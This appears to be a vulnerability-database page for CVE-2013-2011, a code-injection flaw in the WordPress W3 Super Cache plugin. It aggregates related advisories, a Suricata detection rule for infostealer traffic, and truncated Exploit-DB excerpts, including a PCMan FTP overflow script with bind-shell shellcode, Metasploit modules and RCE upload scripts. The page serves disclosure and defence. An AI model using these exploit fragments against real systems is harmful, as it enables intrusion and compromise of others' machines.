CVE-2013-2011
Published 2019-12-26
Priority: P3 · 48 · high · 8.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS: 5.13% (91.3th percentile)
WordPress W3 Super Cache Plugin before 1.3.2 contains a PHP code-execution vulnerability which could allow remote attackers to inject arbitrary code. This issue exists because of an incomplete fix for CVE-2013-2009.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | httpd | — | — |
| automattic | w3_super_cache | < 1.3.2 | 1.3.2 |
CVSS provenance
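| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 6.8 | MEDIUM | AV:N/AC:M/Au:N/C:P/I:P/A:P |
| vendor_apache | — | 7.8 | HIGH | — |
| vendor_redhat | — | 1.9 | LOW | — |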
GHSA
GHSA-v2r5-9cm2-xw4x: WordPress W3 Super Cache Plugin before 1
ghsa_unreviewed·2022-05-05·CVSS 8.8
CVE-2013-2011 [HIGH] GHSA-v2r5-9cm2-xw4x: WordPress W3 Super Cache Plugin before 1
WordPress W3 Super Cache Plugin before 1.3.2 contains a PHP code-execution vulnerability which could allow remote attackers to inject arbitrary code. This issue exists because of an incomplete fix for CVE-2013-2009.
Red Hat
tomcat: World-readable log directory
vendor_redhat·2013-02-22·CVSS 1.9
CVE-2013-0346 [LOW] tomcat: World-readable log directory
Apache Tomcat 7.x uses world-readable permissions for the log directory and its files, which might allow local users to obtain sensitive information by reading a file. NOTE: One Tomcat distributor has stated "The tomcat log directory does not contain any sensitive information."
Statement: Red Hat does not regard this to be a security flaw. The tomcat log directory does not contain any sensitive information, and when sensitive information has been written to log files, this has been considered a security flaw in tomcat (e.g. CVE-2011-2204). This issue was reported to the Apache Tomcat project, and they have not considered it a flaw in any published security advisories.
VMware
VMware vSphere security updates for the authentication service and third party libraries
vendor_vmware·2013-01-31·CVSS 10.0
CVE-2011-1202 [CRITICAL] VMware vSphere security updates for the authentication service and third party libraries
VMSA-2013-0001: VMware vSphere security updates for the authentication service and third party libraries
a. VMware vSphere client-side authentication memory corruption vulnerability
VMware vCenter Server, vSphere Client, and ESX contain a vulnerability in the handling of the management authentication protocol. To exploit this vulnerability, an attacker must convince either vCenter Server, vSphere Client or ESX to interact with a malicious server as a client. Exploitation of the issue may lead to code execution on the client system. To reduce the likelihood of exploitation, vSphere components should be deployed on an isolated management network. The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2013-1405 to this issue. Column 4 of the following tabl
Apache
Apache httpd: CVE-2011-3192
vendor_apache·CVSS 7.8
CVE-2011-3192 [HIGH] Apache httpd: CVE-2011-3192
A flaw was found in the way the Apache HTTP Server handled Range HTTP headers. A remote attacker could use this flaw to cause httpd to use an excessive amount of memory and CPU time via HTTP requests with a specially-crafted Range header. This could be used in a denial of service attack.
Advisory: CVE-2011-3192.txt
Reported to security team: 2011-08-20
Issue public: 2011-08-20
Update 2.2.20 released: 2011-08-30
Update 2.0.65 released: 2013-07-12
Affects: 2.2.19, 2.2.18, 2.2.17, 2.2.16, 2.2.15, 2.2.14, 2.2.13, 2.2.12, 2.2.11, 2.2.10, 2.2.9, 2.2.8, 2.2.6, 2.2.5, 2.2.4, 2.2.3, 2.2.2, 2.2.0, 2.0.64, 2.0.63, 2.0.61, 2.0.59, 2.0.58, 2.0.55, 2.0.54, 2.0.53, 2.0.52, 2.0.51, 2.0.50, 2.0.49, 2.0.48, 2.0.47, 2.0.46, 2.0.45, 2.0.44, 2.0.43, 2.0.42, 2.0.40, 2.0.39, 2.0.37, 2.0.36
Suricata
ET MALWARE Spy/Infostealer.Win32.Embed.A Client Traffic
suricata·2013-05-29
CVE-2010-3333 ET MALWARE Spy/Infostealer.Win32.Embed.A Client Traffic
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE Spy/Infostealer.Win32.Embed.A Client Traffic"; flow:established,to_server; http.uri; content:"/search?hl="; content:"q="; content:"meta="; fast_pattern; pcre:"/meta=(?:(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{4}))?(?:&?id=[a-z]+)?$/"; http.host; content:!"sogou.com"; http.user_agent; content:"Windows NT 5."; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; content:!"|0d 0a|accept"; reference:url,contagiodump.blogspot.no/2011/01/jan-6-cve-2010-3333-with-info-theft.html; classtype:trojan-activity; sid:2016932; rev:8; metadata:attack_target Client_Endpoint, created_at 2013_05_29, deployment Perimeter, malware_family H
Exploit-DB
Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow (PoC)
exploitdb·2014-06-18
CVE-2014-4334 Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow (PoC)
---
#!/usr/bin/perl
#
#
# Ubisoft Rayman Legends v1.2.103716 Remote Stack Buffer Overflow Vulnerability
#
#
# Vendor: Ubisoft Entertainment S.A.
# Product web page: http://www.ubi.com
# Affected version: 1.2.103716, 1.1.100477 and 1.0.95278
#
# Summary: Rayman Legends is a 2013 platform game developed by Ubisoft
# Montpellier and published by Ubisoft. It is the fifth main title in
# the Rayman series and the direct sequel to the 2011 game Rayman Origins.
# The game was released for Microsoft Windows, Xbox 360, PlayStation 3,
# Wii U, and PlayStation Vita platforms in August and September 2013.
# PlayStation 4 and Xbox One versions were released in February 2014.
#
# Desc: The vulnerability is caused due to a memset()
Exploit-DB
PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow
exploitdb·2014-01-29
CVE-2013-4730 PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow
---
# Exploit Title: PCMAN FTP 2.07 ABOR Command Buffer Overflow
# Date: Jan 25,2014
# Exploit Author: Mahmod Mahajna (Mahy)
# Version: 2.07
# Tested on: Windows 7 sp1 x64 (english)
# Email: [email protected]
import socket as s
from sys import argv
#
if(len(argv) != 4):
    print "USAGE: %s host " % argv[0]
    exit(1)
else:
    #store command line arguments
    script,host,fuser,fpass=argv
#vars
junk = '\x41' * 2011 #overwrite function (ABOR) with garbage/junk chars
espaddress = '\x59\x06\xbb\x76' # 76BB0659
nops = '\x90' * 10
shellcode = ( # BIND SHELL | PORT 4444
"\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"
"\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c"
"\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x
Exploit-DB
UPC Ireland Cisco EPC 2425 Router / Horizon Box - WPA-PSK Handshake Information
exploitdb·2013-12-16
CVE-2013-7136 UPC Ireland Cisco EPC 2425 Router / Horizon Box - WPA-PSK Handshake Information
---
# Exploit Title: UPC Ireland Cisco EPC 2425 Router / Horizon Box
# Google Dork:
# Date: 11/12/2013
# Author: Matt O'Connor / Planit Computing
# Advisory Link: http://www.planitcomputing.ie/upc-wifi-attack.pdf
# Version:
# Category: Remote
# Tested on: Cisco EPC 2425 / Horizon Box
The Cisco EPC 2425 routers supplied by UPC are vulnerable to an offline dictionary attack if the WPA-PSK handshake is obtained by an attacker.
The WPA-PSK pass phrase has the following features:
Random
A to Z Uppercase only
8 characters long
208,827,064,576 possible combinations (AAAAAAAA to ZZZZZZZZ), 26^8
We notified UPC about the problem in November 2011 yet UPC are still supplying customers with newer modems / hor
Exploit-DB
Zimbra 2009-2013 - Local File Inclusion
exploitdb·2013-12-06
CVE-2013-7091 Zimbra 2009-2013 - Local File Inclusion
---
# Exploit Title: Zimbra 0day exploit / Privilege escalation via LFI
# Date: 06 Dec 2013
# Exploit Author: rubina119
# Contact Email : rubina119[at]gmail.com
# Vendor Homepage: http://www.zimbra.com/
# Version: 2009, 2010, 2011, 2012 and early 2013 versions are affected,
# Tested on: Centos(x), Ubuntu.
# CVE : No CVE, no patch just 0Day
# State : Critical
# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30085.zip (zimbraexploit_rubina119.zip)
---------------Description-----------------
This script exploits a Local File Inclusion in
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
which allows us to see localconfig.xml
that contains LDAP root credentials which allo
Exploit-DB
ZonPHP 2.25 - Remote Code Execution
exploitdb·2013-10-20
CVE-2011-4275 ZonPHP 2.25 - Remote Code Execution
---
# Exploit Title: ZonPHP V2.25 RCE Vulnerability
# Google Dork: intext:"Made by SLAPER"
# Date: 21-10-2013
# Exploit Author: Halim Cruzito
# Vendor Homepage: http://www.slaper.be
# Software Link: http://www.slaper.be/zonPHPv225.zip
# Version: v2.25
# Tested on: Windows 7
# PoC:
";
$headers = array("User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0",
"Content-Type: text/plain");
$rc = curl_init();
curl_setopt($rc, CURLOPT_URL, $url.$path.$filename);
curl_setopt($rc, CURLOPT_HTTPHEADER, $headers);
curl_setopt($rc, CURLOPT_POST, 1);
curl_setopt( $rc, CURLOPT_SSL_VERIFYPEER, 1);
curl_setopt($rc, CURLOPT_POSTFIELDS, $data);
curl_setopt($rc, CURLOPT_RETURNTRANSFER, 1);
$ex = curl_exec($rc);
curl_close($rc);
$shell
Exploit-DB
ERS Viewer 2011 - '.ERS' File Handling Buffer Overflow (Metasploit)
exploitdb·2013-05-14
CVE-2013-0726 ERS Viewer 2011 - '.ERS' File Handling Buffer Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 "ERS Viewer 2011 ERS File Handling Buffer Overflow",
'Description' => %q{
This module exploits a buffer overflow vulnerability found in ERS Viewer 2011
(version 11.04). The vulnerability exists in the module ermapper_u.dll where the
function ERM_convert_to_correct_webpath handles user provided data in a insecure
way. It results in arbitrary code execution under the context of the user viewing
a specially crafted .ers file. This
Exploit-DB
Joomla! Component com_civicrm 4.2.2 - Remote Code Injection
exploitdb·2013-04-22
CVE-2011-4275 Joomla! Component com_civicrm 4.2.2 - Remote Code Injection
---
# Exploit Title: joomla component com_civicrm remote code injection exploit
# Google Dork:"Index of /joomla/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart"
# Date: 20/04/2013
# Exploit Author: iskorpitx
# Vendor Homepage: http://civicrm.org
# Software Link: http://civicrm.org/blogs/yashodha/announcing-civicrm-422
# Version: [civicrm 4.2.2]
# Tested on: Win8 Pro x64
# CVE : http://www.securityweb.org
exp.php -u http://target.com/ -f post.php
$options = getopt('u:f:');
if(!isset($options['u'], $options['f']))
die("\n Usage example: php jnews.php -u http://target.com/ -f post.php\n
-u http://target.com/ The full path to Joomla!
-f post.php The name of the file to create.\n");
$url = $options['u'];
$fi
Exploit-DB
FreeBSD 9.1 - 'ftpd' Remote Denial of Service
exploitdb·2013-02-05·CVSS 4.0
CVE-2011-0418 [MEDIUM] FreeBSD 9.1 - 'ftpd' Remote Denial of Service
---
FreeBSD 9.1 ftpd Remote Denial of Service
Maksymilian Arciemowicz
http://cxsecurity.org/
http://cxsec.org/
Public Date: 01.02.2013
URL: http://cxsecurity.com/issue/WLB-2013020003
--- 1. Description ---
I have decided to check BSD ftpd servers once again for wildcards. An old
bug in libc (CVE-2011-0418) allows Denial of Service of ftpd in the last
FreeBSD version.
An attacker who may connect anonymously to the FTP server may cause CPU
resource exhaustion. Logging in as 'USER anonymous' 'PASS anonymous' and
sending a 'STAT' command with a special wildcard is enough to create an ftpd
process with 100% CPU usage.
Proof of Concept (POC):
See the difference between NetBSD/libc and FreeBSD/libc.
--- PoC ---
#include
#include
int main(){
glob_t globbuf;
char stringa[]="{
Exploit-DB
Linksys WRT54GL Firmware 4.30.15 build 2 - Multiple Vulnerabilities
exploitdb·2013-01-18
CVE-2013-2679 Linksys WRT54GL Firmware 4.30.15 build 2 - Multiple Vulnerabilities
---
Device Name: Linksys WRT54GL v1.1
Vendor: Linksys/Cisco
============ Vulnerable Firmware Releases: ============
Firmware Version: 4.30.15 build 2, 01/20/2011
============ Device Description: ============
The Router lets you access the Internet via a wireless connection, broadcast at up to 54 Mbps, or through one of its four switched ports. You can also use the Router to share resources such as computers, printers and files. A variety of security features help to protect your data and your privacy while online. Security features include WPA2 security, a Stateful Packet Inspection (SPI) firewall and NAT technology. Configuring the Router is easy using the provided browser-based utility.
Source: http://homesupport.
Exploit-DB
Microsoft Windows - TCP/IP Stack Reference Counter Integer Overflow (MS11-083)
exploitdb·2011-11-08
CVE-2011-2013 Microsoft Windows - TCP/IP Stack Reference Counter Integer Overflow (MS11-083)
---
// source: https://www.securityfocus.com/bid/50517/info
Microsoft Windows is prone to a remote integer-overflow vulnerability that affects the TCP/IP stack.
An attacker can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will completely compromise affected computers. Failed exploit attempts may result in a denial-of-service condition.
#!/bin/sh
cat >> winnuke2011.c
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int port;
int active = 0;
pthread_mutex_t mutexactive;
void *sendpackets(void *ptr);
int main(int argc, char *argv[]) {
pthread_t thread;
int iret,lthreads;
pid_t pid;
printf("[+] MS11-083 DoS/PoC
Exploit-DB
7-Technologies IGSS 9 - Data Server/Collector Packet Handling (Metasploit)
exploitdb·2011-05-30
CVE-2013-0657 7-Technologies IGSS 9 - Data Server/Collector Packet Handling (Metasploit)
---
##
# $Id: igss9_misc.rb 12779 2011-05-31 14:33:19Z swtornio $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 "7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities",
'Description' => %q{
This module exploits multiple vulnerabilities found on IGSS 9's Data Server and
Data Collector services. The initial approach is first by transferring our binary
with Write packets (opcode 0x0D) via port 12401 (igssdataserver.exe), and then send
an EXE packe
Exploit-DB
WordPress Plugin User Photo Component - Arbitrary File Upload
exploitdb·2011-02-17
CVE-2013-1916 WordPress Plugin User Photo Component - Arbitrary File Upload
---
# Exploit Title: WordPress User Photo Component Remote File Upload Vulnerability
# Google Dork: inurl:"/wp-content/uploads/userphoto/"
# Date: 17/FEB/2011
# Author: ADVtools
# Software Link: http://wordpress.org/extend/plugins/user-photo/
# Version: 0.9.4
# Tested on: *nix , Windows
I. Product Description
User Photo is a WordPress component that allows a user to associate a photo with her account and for this photo to be displayed in posts and comments.
II. Vulnerability description
When a photo is uploaded, it is only partially validated and it is possible to upload a backdoor on the server hosting WordPress. This backdoor can be called (executed) even if the photo has not been yet approved.
III. Analysis
1. Image
HackerOne
SSL/TLS Vulnerability at khanacademy.org
hackerone·2017-02-22·CVSS 7.5
[HIGH] SSL/TLS Vulnerability at khanacademy.org
CVE-2011-3389
Description :
The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack.
Problem Location :
https://www.khanacademy.org/
Mitigation :
Upgrade the TLS version on the server to the latest stable version
CVE-2013-0169:
Description :
The TLS protocol 1.1
Bugzilla
CVE-2013-4550 CVE-2011-5268 bip: failed SSL handshake resource leak
bugzilla·2013-11-08·CVSS 4.3
CVE-2013-4550 [MEDIUM] CVE-2013-4550 CVE-2011-5268 bip: failed SSL handshake resource leak
Marc Deslauriers reports:
Hello,
bip 0.8.8 and earlier contains an issue where failed SSL handshakes result in a
resource leak. A remote attacker can use this flaw to cause bip to run out of
resources, resulting in a denial of service.
Upstream bug:
https://projects.duckcorp.org/issues/261
Fixed by the following commit in 0.8.9:
https://projects.duckcorp.org/projects/bip/repository/revisions/df45c4c2d6f892e3e1dec23ce0ed2575b53a7d8c
Downstream bug:
https://bugs.launchpad.net/ubuntu/precise/+source/bip/+bug/1247888
Discussion:
Created bip tracking bugs for this issue:
Affects: fedora-all [bug 1028608]
Affects: epel-6 [bug 1028609]
---
Created bip tracking bugs for this issue:
Affects: epel-5 [bug 1028610]
---
b
Bugzilla
CVE-2011-5267 xinha: multiple cross-site scripting vulnerabilities
bugzilla·2013-11-05·CVSS 4.3
CVE-2011-5267 [MEDIUM] CVE-2011-5267 xinha: multiple cross-site scripting vulnerabilities
Common Vulnerabilities and Exposures assigned an identifier CVE-2011-5267 to
the following vulnerability:
Name: CVE-2011-5267
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5267
Assigned: 20131105
Reference: EXPLOIT-DB:16988
Reference: http://www.exploit-db.com/exploits/16988
Reference: http://www.openwall.com/lists/oss-security/2013/09/01/1
Reference: http://www.openwall.com/lists/oss-security/2013/09/01/3
Reference: http://www.autosectools.com/Advisories/WikiWig.5.01_Persistent-Reflected.Cross-site.Scripting_139.html
Reference: OSVDB:71070
Reference: http://www.osvdb.org/71070
Multiple cross-site scripting (XSS) vulnerabilities in
spell-check-savedicts.php in the SpellChecker module in Xinha, as used
in Wi
Bugzilla
CVE-2011-4969 jquery: Cross-site scripting (XSS) via $(location.hash) and $(#<tag>)
bugzilla·2013-02-01·CVSS 4.3
CVE-2011-4969 [MEDIUM] CVE-2011-4969 jquery: Cross-site scripting (XSS) via $(location.hash) and $(#<tag>)
A cross-site scripting (XSS) flaw was found in the way jQuery, a fast, small, and feature-rich JavaScript library, performed sanitization of location.hash and arguments in certain circumstances. A remote attacker could provide a specially-crafted web page to a web-based application using the jQuery library that, when processed would lead to arbitrary HTML or web script execution in the context of logged-in user session.
Upstream bug report:
[1] http://bugs.jquery.com/ticket/9521
References:
[2] http://blog.jquery.com/2011/09/01/jquery-1-6-3-released/
[3] http://www.openwall.com/lists/oss-security/2013/01/31/3
Discussion:
Created drupal7-jquery_update tracking bugs for this issue
Affects: fedora-all [bug 89
Bugzilla
CVE-2013-0200 hplip: insecure temporary file handling flaws
bugzilla·2013-01-21·CVSS 1.2
CVE-2013-0200 [LOW] CVE-2013-0200 hplip: insecure temporary file handling flaws
Temporary file handling flaws were found in several places in hplip. Because predictable temporary filenames are used, an attacker could use a symlink attack to overwrite an arbitrary file with the privileges of the process running hplip.
This is a different flaw than CVE-2011-2722.
Discussion:
Acknowledgements:
This issue was discovered by Tim Waugh of Red Hat.
---
This issue has been addressed in following products:
Red Hat Enterprise Linux 6
Via RHSA-2013:0500 https://rhn.redhat.com/errata/RHSA-2013-0500.html
---
Statement:
This issue does not affect the version of hplip and hplip3 as shipped with Red Hat Enterprise Linux 5. This issue has been addressed in Red Hat Enterprise Linux 6 via RHSA-2013:0500.
Bugzilla
CVE-2011-4966 freeradius: does not respect expired passwords when using the unix module
bugzilla·2012-11-21·CVSS 6.0
CVE-2011-4966 [MEDIUM] CVE-2011-4966 freeradius: does not respect expired passwords when using the unix module
When FreeRADIUS is configured to use the 'unix' module and shadow passwords, the password expiration field is ignored. This could allow a user with an expired password to authenticate against FreeRADIUS.
This was corrected upstream:
https://github.com/alandekok/freeradius-server/commit/1b1ec5ce75e224bd1755650c18ccdaa6dc53e605
And was also corrected in Red Hat Enterprise Linux 6 via RHBA-2012:0881:
https://rhn.redhat.com/errata/RHBA-2012-0881.html
Statement:
(none)
Discussion:
This issue affects the version of freeradius and freeradius2 as shipped with Red Hat Enterprise Linux 5.
---
This issue has been addressed in following products:
Red Hat Enterprise Linux 5
Via RHSA-2013:0134 https://rh
Bugzilla
CVE-2011-5036 CVE-2013-0184 rubygem-rack various flaws [epel-all]
bugzilla·2012-01-02·CVSS 5.0
CVE-2011-5036 [MEDIUM] CVE-2011-5036 CVE-2013-0184 rubygem-rack various flaws [epel-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include this bug ID and the
bug IDs of this bug's parent bugs filed against the "Security Response"
product (the top-level CVE bugs). Please mention the CVE IDs being fixed
in the RPM changelog when available.
Bodhi update submission link:
https://admin.fedoraproject.org/updates/new/?type_=security&bugs=7711
Bugzilla
CVE-2011-4575 JMX Console: XSS in invoke operation
bugzilla·2011-12-06·CVSS 4.3
CVE-2011-4575 [MEDIUM] CVE-2011-4575 JMX Console: XSS in invoke operation
The parameters passed to operation invocations on the JMX console are not properly sanitized. Remote attackers can use this flaw to inject arbitrary web script or HTML into the JMX console.
Discussion:
Acknowledgment:
Red Hat would like to thank Tyler Krpata for reporting this issue.
---
This issue has been addressed in following products:
JBoss Enterprise Application Platform 5.2.0
Via RHSA-2013:0194 https://rhn.redhat.com/errata/RHSA-2013-0194.html
---
This issue has been addressed in following products:
JBEAP 5 for RHEL 5
Via RHSA-2013:0192 https://rhn.redhat.com/errata/RHSA-2013-0192.html
---
This issue has been addressed in following products:
JBEAP 5 for RHEL 6
Via RHSA-2013:0191 https://rhn.redhat.com/errata/RHSA-201
http://www.openwall.com/lists/oss-security/2013/04/25/4
http://www.securityfocus.com/bid/59473
https://exchange.xforce.ibmcloud.com/vulnerabilities/83800
https://security-tracker.debian.org/tracker/CVE-2013-2011